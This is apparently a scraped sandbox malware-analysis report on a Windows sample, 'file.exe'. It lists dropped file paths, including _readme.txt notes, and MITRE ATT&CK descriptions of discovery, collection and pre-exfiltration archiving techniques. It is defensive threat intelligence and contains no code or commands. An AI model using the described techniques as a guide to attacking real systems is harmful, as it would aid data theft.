Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\$WinREAgent\Scratch\_readme.txt

C:\$WinREAgent\_readme.txt

C:\ProgramData\EGIJEBGDAFHI\AFBKKF

C:\ProgramData\EGIJEBGDAFHI\BGHJEB

C:\ProgramData\EGIJEBGDAFHI\BKECBA

C:\ProgramData\EGIJEBGDAFHI\DAKFCG

C:\ProgramData\EGIJEBGDAFHI\DAKFCG-shm

Windows Analysis Report
file.exe

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre